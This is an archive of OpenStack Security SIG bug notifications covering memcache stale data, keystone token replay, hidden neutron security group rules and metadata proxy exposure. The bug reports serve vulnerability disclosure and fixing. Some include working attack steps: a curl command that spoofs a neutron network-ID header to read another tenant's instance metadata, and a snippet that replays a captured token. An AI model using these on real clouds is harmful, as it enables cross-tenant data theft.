possible that the server will contain stale data. The default is now to supply the ``flush_on_reconnect`` optional argument to the backend. 
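For illustration only, this is how that flag is passed to a
python-memcached client (server addresses are placeholders; oslo.cache
forwards the option through its backend arguments rather than building
the client like this):

    import memcache

    # flush_on_reconnect=1 flushes a server's cache when the client
    # reconnects to it, so keys that were remapped to another server
    # during the outage cannot be read back stale afterwards.
    client = memcache.Client(['192.0.2.10:11211', '192.0.2.11:11211'],
                             flush_on_reconnect=1)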
This means that when the service connects to a memcache server, it will flush all cached data in the server. The pooled backend is more likely to run into issues with this as it does not explicitly use a thread.local for the client. The non-pooled backend was not touched, it is not the recommended production use-case. See the help from python-memcached: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. Change-Id: I3e335261f749ad065e8abe972f4ac476d334e6b3 closes-bug: #1819957 (cherry picked from commit 1192f185a5fd2fa6177655f157146488a3de81d1) ** Tags added: in-stable-queens -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in oslo.cache: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From fungi at yuggoth.org Fri Feb 28 00:03:59 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 00:03:59 -0000 Subject: [Openstack-security] [Bug 1492398] Re: VXLAN Overlay ping issue when Gateway IP is set to one of local NIC's IP address References: <20150904170107.9123.65334.malonedeb@wampee.canonical.com> Message-ID: <158284824046.19496.8845727908586697446.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. 
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added to the bug as
- attachments.
-
 There's an issue when a VXLAN overlay VM tries to ping an overlay IP
 address that is also the same as one of the host machine's local IP
 addresses. In my setup, I've tried pinging the overlay VM's router's
 IP address. Here are the details:

 VXLAN Id is 100 (this number is immaterial, what matters is that we
 use VXLAN for tenant traffic)

 Overlay VM:
 IP: 10.0.1.3/24
 GW: 10.0.1.1

 Host Info:
 enp21s0f0: 1.1.1.5/24 (This interface is used to contact the
 controller as well as for encapsulated datapath traffic.)
 qbr89a962f7-9b: Linux Bridge to which the Overlay VM connects. No IP
 address on this one.

 brctl show:
 qbr89a962f7-9b      8000.56f6fefb9d5c   no      qvb89a962f7-9b
                                                 tap89a962f7-9b

 ifconfig qbr89a962f7-9b
 qbr89a962f7-9b: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet6 fe80::54f6:feff:fefb:9d5c  prefixlen 64  scopeid 0x20<link>
         ether 56:f6:fe:fb:9d:5c  txqueuelen 0  (Ethernet)
         RX packets 916  bytes 27072 (26.4 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 10  bytes 780 (780.0 B)
         TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

 I am using a previously unused NIC named eno1 for this example. When
 eno1 has no IP address, ping from the overlay VM to the router is
 successful. ARP on the VM shows the correct MAC resolution. When I
 set eno1 to 10.0.1.1, ARP on the overlay VM shows qbr89a962f7-9b's
 MAC address and ping never succeeds.

 When things work OK, ARP for 10.0.1.1 is fa:16:3e:0c:52:6d
 When eno1 is set to 10.0.1.1, ARP resolution is incorrect: 10.0.1.1
 resolves to 56:f6:fe:fb:9d:5c and ping never succeeds.

 I've deleted ARPs to ensure that resolution is triggered. It appears
 as if the OVS br-int never received the ARP request.

 Thanks,
 -Uday

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1492398

Title:
  VXLAN Overlay ping issue when Gateway IP is set to one of local NIC's IP address

Status in neutron:
  Expired
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  There's an issue when a VXLAN overlay VM tries to ping an overlay IP
  address that is also the same as one of the host machine's local IP
  addresses. In my setup, I've tried pinging the overlay VM's router's
  IP address. Here are the details:

  VXLAN Id is 100 (this number is immaterial, what matters is that we
  use VXLAN for tenant traffic)

  Overlay VM:
  IP: 10.0.1.3/24
  GW: 10.0.1.1

  Host Info:
  enp21s0f0: 1.1.1.5/24 (This interface is used to contact the
  controller as well as for encapsulated datapath traffic.)
  qbr89a962f7-9b: Linux Bridge to which the Overlay VM connects. No IP
  address on this one.
  brctl show:
  qbr89a962f7-9b      8000.56f6fefb9d5c   no      qvb89a962f7-9b
                                                  tap89a962f7-9b

  ifconfig qbr89a962f7-9b
  qbr89a962f7-9b: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
          inet6 fe80::54f6:feff:fefb:9d5c  prefixlen 64  scopeid 0x20<link>
          ether 56:f6:fe:fb:9d:5c  txqueuelen 0  (Ethernet)
          RX packets 916  bytes 27072 (26.4 KiB)
          RX errors 0  dropped 0  overruns 0  frame 0
          TX packets 10  bytes 780 (780.0 B)
          TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

  I am using a previously unused NIC named eno1 for this example. When
  eno1 has no IP address, ping from the overlay VM to the router is
  successful. ARP on the VM shows the correct MAC resolution. When I
  set eno1 to 10.0.1.1, ARP on the overlay VM shows qbr89a962f7-9b's
  MAC address and ping never succeeds.

  When things work OK, ARP for 10.0.1.1 is fa:16:3e:0c:52:6d
  When eno1 is set to 10.0.1.1, ARP resolution is incorrect: 10.0.1.1
  resolves to 56:f6:fe:fb:9d:5c and ping never succeeds.

  I've deleted ARPs to ensure that resolution is triggered. It appears
  as if the OVS br-int never received the ARP request.

  Thanks,
  -Uday

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1492398/+subscriptions

From fungi at yuggoth.org Fri Feb 28 00:02:26 2020
From: fungi at yuggoth.org (Jeremy Stanley)
Date: Fri, 28 Feb 2020 00:02:26 -0000
Subject: [Openstack-security] [Bug 1447673] Re: session ID reusable?
References: <20150423154006.13687.43783.malonedeb@wampee.canonical.com>
Message-ID: <158284814758.19546.12985715331879618218.launchpad@chaenomeles.canonical.com>

** Description changed:

- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added as to the bug as
- attachments.
-
 Reported via private E-mail from Anass ANNOUR:

 I had tested replaying the session ID and the token to a local
 environment between two distinct IPs, and it worked perfectly.

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1447673

Title:
  session ID reusable?

Status in OpenStack Identity (keystone):
  Expired
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Reported via private E-mail from Anass ANNOUR:

  I had tested replaying the session ID and the token to a local
  environment between two distinct IPs, and it worked perfectly.
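Since keystone tokens are bearer tokens, the replay described above
needs nothing beyond the captured header value. A minimal sketch with a
placeholder endpoint and token, not the reporter's actual test:

    import requests

    TOKEN = "gAAAAAB..."  # placeholder: a token captured on another host

    # Validating the token from a second machine succeeds while the
    # token remains valid (subject to keystone policy); nothing binds
    # it to the original client's IP address or browser session.
    resp = requests.get("http://203.0.113.5:5000/v3/auth/tokens",
                        headers={"X-Auth-Token": TOKEN,
                                 "X-Subject-Token": TOKEN})
    print(resp.status_code)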
To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1447673/+subscriptions From 1824248 at bugs.launchpad.net Fri Feb 28 03:20:53 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 28 Feb 2020 03:20:53 -0000 Subject: [Openstack-security] [Bug 1824248] Related fix merged to neutron-tempest-plugin (master) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158286005370.14436.3588009643282934071.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/681912 Committed: https://git.openstack.org/cgit/openstack/neutron-tempest-plugin/commit/?id=31c0006ded28255e2502d2975648f1fe603ec127 Submitter: Zuul Branch: master commit 31c0006ded28255e2502d2975648f1fe603ec127 Author: Slawek Kaplonski Date: Thu Sep 12 22:11:35 2019 +0200 Add list security group rules API test This test checks that regular user can see all SG rules which belongs to his tenant OR belongs to security group owned by his tenant. This test also ensures that SG rules from different tenants and Security Groups are not visible for regular user. Fix for master branch Depends-On: https://review.opendev.org/681910 Fix for stable/train Depends-On: https://review.opendev.org/688715 Fix for stable/stein Depends-On: https://review.opendev.org/688716 Fix for stable/rocky Depends-On: https://review.opendev.org/688717 Fix for stable/queens Depends-On: https://review.opendev.org/688719 Change-Id: Ic2e97ab8162d10e507ef83b9af0840e7311f0587 Related-Bug: #1824248 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Fri Feb 28 13:59:14 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 13:59:14 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289835446.26517.15637580122096877976.launchpad@gac.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under - embargo. Please do not make any public mention of embargoed - (private) security vulnerabilities before their coordinated - publication by the OpenStack Vulnerability Management Team in the - form of an official OpenStack Security Advisory. This includes - discussion of the bug or associated fixes in public forums such as - mailing lists, code review systems and bug trackers. Please also - avoid private disclosure to other individuals not already approved - for access to this information, and provide this same reminder to - those who are made aware of the issue prior to publication. All - discussion should remain confined to this private bug report, and - any proposed fixes should be added to the bug as attachments. This - embargo shall not extend past 2020-05-27 and will be made - public by or on that date if no fix is identified. - Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). 
The security issue is that one can access metadata of an arbitrary
other instance if the following conditions are met (let's call the
"other instance" a "victim"; it can be in any other project not
normally available to the attacker):

1) Victim's port fixed IP address is known.
2) Victim's port network ID is known.
3) Attacker can use a network with access to the l3 agent metadata
proxy (i.e. can use routers) and deploy instances.

The scenario is as follows:
1) create a self-service network including the targeted address
2) create an instance with the same fixed IP address
3) create a router and wire it up with that network (other connections irrelevant)
4) boot up the instance (make sure to drop the potential route to the dhcp agent metadata proxy if used)
5) run e.g.:
curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json

Observed behaviour: Normally-secret information disclosure.

Expected behaviour: Proxy ignores (removes) that extra header and
proceeds as if nothing happened (most expected) OR proxy returns an
error (and logs it / sends a notification about it) OR proxy blocks the
request and calls the police as you are a bad boy :-) (least
expected... but nice)

Initial code analysis:
1) the haproxy config is inadequate:
https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68
^ this should replace all current headers in the current trust model
2) the reason this works with the l3 agent (and so far not with the
dhcp agent, unless there is some other general header exploit in the
stack) is the following lines:
https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152

** Information type changed from Private Security to Public

** Changed in: ossa
   Status: Incomplete => Won't Fix

** Tags added: security

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1865036

Title:
  l3 agent metadata proxy allows access to metadata from any available network

Status in neutron:
  Confirmed
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Tested with Train release, by quick code check it affects also at
  least Rocky, Stein and Ussuri (current master).

  The security issue is that one can access metadata of an arbitrary
  other instance if the following conditions are met (let's call the
  "other instance" a "victim"; it can be in any other project not
  normally available to the attacker):

  1) Victim's port fixed IP address is known.
  2) Victim's port network ID is known.
  3) Attacker can use a network with access to the l3 agent metadata
  proxy (i.e. can use routers) and deploy instances.

  The scenario is as follows:
  1) create a self-service network including the targeted address
  2) create an instance with the same fixed IP address
  3) create a router and wire it up with that network (other connections irrelevant)
  4) boot up the instance (make sure to drop the potential route to the dhcp agent metadata proxy if used)
  5) run e.g.:
  curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json

  Observed behaviour: Normally-secret information disclosure.
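A minimal sketch of what the first "expected behaviour" option below
amounts to: dropping client-supplied identity headers so only proxy-set
values survive. The network ID header name comes from this report, the
router ID header name from the follow-up comments; the function itself
is an assumption, not neutron code:

    # Hypothetical scrubber for the metadata proxy: discard identity
    # headers supplied by the client and keep only the proxy's own.
    UNTRUSTED_HEADERS = ('X-Neutron-Network-ID', 'X-Neutron-Router-ID')

    def scrub_identity_headers(headers, proxy_supplied):
        clean = {name: value for name, value in headers.items()
                 if name not in UNTRUSTED_HEADERS}
        clean.update(proxy_supplied)  # the proxy's own view wins
        return clean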
  Expected behaviour: Proxy ignores (removes) that extra header and
  proceeds as if nothing happened (most expected) OR proxy returns an
  error (and logs it / sends a notification about it) OR proxy blocks
  the request and calls the police as you are a bad boy :-) (least
  expected... but nice)

  Initial code analysis:
  1) the haproxy config is inadequate:
  https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68
  ^ this should replace all current headers in the current trust model
  2) the reason this works with the l3 agent (and so far not with the
  dhcp agent, unless there is some other general header exploit in the
  stack) is the following lines:
  https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions

From 1865036 at bugs.launchpad.net Fri Feb 28 14:01:04 2020
From: 1865036 at bugs.launchpad.net (Brian Haley)
Date: Fri, 28 Feb 2020 14:01:04 -0000
Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network
References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com>
Message-ID: <158289846466.12728.109765042463052456.malone@soybean.canonical.com>

What I was trying to say in my previous comment was that a tenant
can't look up a network ID of another tenant, just their own and any
that are shared. Someone with admin creds can look up all the network
IDs.

I can send my patch once this is made public, but it will delete the
portions of a request that shouldn't be there - if it's expecting a
network ID it will delete any router ID header, and vice-versa.

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1865036

Title:
  l3 agent metadata proxy allows access to metadata from any available network

Status in neutron:
  Confirmed
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Tested with Train release, by quick code check it affects also at
  least Rocky, Stein and Ussuri (current master).

  The security issue is that one can access metadata of an arbitrary
  other instance if the following conditions are met (let's call the
  "other instance" a "victim"; it can be in any other project not
  normally available to the attacker):

  1) Victim's port fixed IP address is known.
  2) Victim's port network ID is known.
  3) Attacker can use a network with access to the l3 agent metadata
  proxy (i.e. can use routers) and deploy instances.

  The scenario is as follows:
  1) create a self-service network including the targeted address
  2) create an instance with the same fixed IP address
  3) create a router and wire it up with that network (other connections irrelevant)
  4) boot up the instance (make sure to drop the potential route to the dhcp agent metadata proxy if used)
  5) run e.g.:
  curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json

  Observed behaviour: Normally-secret information disclosure.

  Expected behaviour: Proxy ignores (removes) that extra header and
  proceeds as if nothing happened (most expected) OR proxy returns an
  error (and logs it / sends a notification about it) OR proxy blocks
  the request and calls the police as you are a bad boy :-) (least
  expected...
but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1824248 at bugs.launchpad.net Fri Feb 28 15:29:31 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 28 Feb 2020 15:29:31 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 13.0.7 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158290377161.26762.7877151877205366079.malone@gac.canonical.com> This issue was fixed in the openstack/neutron 13.0.7 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The Manage Rules part of the GUI hides rules that are currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of the owner of those VMs. When sending a GET request as below, it responds only with the rules created by the user; this happens when using the Manage Rules part of the GUI: On the other hand, when using a GET request as below, it responds with all security groups including all rules, with no filtering; this is used in the Launch Instance modal window: Here is an example of the rules displayed in the Manage Rules part of the GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed, there are no rules for ports 44 and 22 (SSH). And from the Launch Instance modal window, as well as the CLI, we can see that there are two more rules that are invisible to the user, for ports 44 and 22 (SSH), as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , 
]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Fri Feb 28 14:02:31 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 14:02:31 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158289855119.12393.5945566433888673044.malone@soybean.canonical.com> Switched to public, treating as a class C1 report for now (impractical to exploit, no advisory required, someone might assign a CVE, security note may be warranted) but we can adjust the classification if new information comes to light. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is that one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected...
but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From fungi at yuggoth.org Fri Feb 28 14:07:42 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 14:07:42 -0000 Subject: [Openstack-security] [Bug 1790706] Re: Additional metadata service endpoints on OpenStack accessible References: <153608772235.32124.2296330259413474310.malonedeb@soybean.canonical.com> Message-ID: <158289886301.11782.12602631504560007057.malone@wampee.canonical.com> As this was fixed by the time Stein released, and stable/rocky is entering extended maintenance now, it probably makes no sense to try and issue an advisory (though anyone is welcome to submit a backport to branches under extended maintenance there will be no further point releases tagged for them). ** Description changed: - This issue is being treated as a potential security risk under - embargo. Please do not make any public mention of embargoed - (private) security vulnerabilities before their coordinated - publication by the OpenStack Vulnerability Management Team in the - form of an official OpenStack Security Advisory. This includes - discussion of the bug or associated fixes in public forums such as - mailing lists, code review systems and bug trackers. Please also - avoid private disclosure to other individuals not already approved - for access to this information, and provide this same reminder to - those who are made aware of the issue prior to publication. All - discussion should remain confined to this private bug report, and - any proposed fixes should be added to the bug as attachments. This - embargo shall not extend past 2020-05-27 and will be made - public by or on that date if no fix is identified. - Note: I'm reporting this on behalf of our partner SAP. While the bug is about Newton, one of our neutron developers believes this may still be valid for newer versions: "The bug might be still valid in upstream, since there are no specific case where they are filtering based on the IP 169.254.169.254, since they are passing the same port as such." # Setup: OpenStack Newton with `force_metadata = true` on all network nodes Kubernetes Gardener setup (seed+shoot) on OpenStack # Detail description from the hacker simulation: By running a nmap -sn … scan (ping scan) we discovered several endpoints in the shoot network (apart from the nodes that can be seen from `kubectl --kubeconfig myshoot.kubeconfig get nodes`). We noticed that some of the endpoints also serve meta and user data on port 80, i.e. the metadata service is not only available from the well-known metadata service IP (http://169.254.169.254/…, https://docs.openstack.org/nova/latest/user/metadata-service.html) but also from those other addresses. In our test the endpoints were 10.250.0.2-7. We learned that the endpoints probably are the OpenStack DHCP nodes, i.e. every OpenStack DHCP endpoint appears to also serve the metadata. 
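In shell terms, the discovery described above amounts to something like this (a sketch; the nmap ping scan is the one named in the report and the 10.250.0.x addresses are the ones it found, while the exact scan range and the probed path are assumptions):

    # ping-scan the shoot network for unexpected live endpoints
    nmap -sn 10.250.0.0/24
    # probe a discovered endpoint: a DHCP namespace proxying metadata
    # will answer on plain port 80
    curl http://10.250.0.2/openstack/latest/meta_data.json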
While the accessibility of the metadata service is a known problem, this situation is “worse” (compared to e.g. Gardener seed and shoot clusters on AWS) for the following reasons: 1. If a network policy is applied to block access from cluster payloads to the metadata service, it’s not enough to block well-known `169.254.169.254` but it must also block all access to all other existing endpoints. How can the definite set of endpoints be determined? Are they guaranteed to not change during the lifetime of a cluster? 2. If the metadata service is only accessible via 169.254.169.254, the known `kubectl proxy` issue (details can be shared if needed) cannot be used to get access to the metadata service, as the link-local 169.254.0.0/16 address range is not allowed by the Kubernetes API server as an endpoint address. But for example 10.250… is allowed, i.e. a shoot user on OpenStack can use the attack to get access to the metadata service in the seed network. The fact that no fix is in sight for the `kubectl proxy` issue and it might not be patchable poses an additional risk regarding 2. We will try to follow up on that with the Kubernetes security team once again. # Detail information: Due to the “force_metadata” setting the DHCP namespaces are exposing the metadata service: # ip netns exec qdhcp-54ad9fe0-2ce5-4083-a32b-ca744e806d1f netstat -tulpen Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 0 1934832519 54198/python tcp 0 0 10.222.0.3:53 0.0.0.0:* LISTEN 0 1934920972 54135/dnsmasq tcp 0 0 169.254.169.254:53 0.0.0.0:* LISTEN 0 1934920970 54135/dnsmasq tcp 0 0 fe80::f816:3eff:fe01:53 :::* LISTEN 198 1934909191 54135/dnsmasq udp 0 0 10.222.0.3:53 0.0.0.0:* 0 1934920971 54135/dnsmasq udp 0 0 169.254.169.254:53 0.0.0.0:* 0 1934920969 54135/dnsmasq udp 0 0 0.0.0.0:67 0.0.0.0:* 0 1934920966 54135/dnsmasq udp 0 0 fe80::f816:3eff:fe01:53 :::* 198 1934909190 54135/dnsmasq The problem is that the metadata proxy is listening to 0.0.0.0:80 instead of 169.254.169.254:80. This lets the metadata service respond on DHCP IP addresses as well, which cannot easily be blocked. This fix mitigated the problem: --- neutron.org/agent/metadata/namespace_proxy.py 2018-08-31 12:42:25.901681939 +0000 +++ neutron/agent/metadata/namespace_proxy.py 2018-08-31 12:43:17.541826180 +0000 @@ -130,7 +130,7 @@              self.router_id)          proxy = wsgi.Server('neutron-network-metadata-proxy',                              num_threads=self.proxy_threads) - proxy.start(handler, self.port) + proxy.start(handler, self.port, '169.254.169.254')          # Drop privileges after port bind          super(ProxyDaemon, self).run() ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1790706 Title: Additional metadata service endpoints on OpenStack accessible Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: Note: I'm reporting this on behalf of our partner SAP. While the bug is about Newton, one of our neutron developers believes this may still be valid for newer versions: "The bug might be still valid in upstream, since there are no specific case where they are filtering based on the IP 169.254.169.254, since they are passing the same port as such."
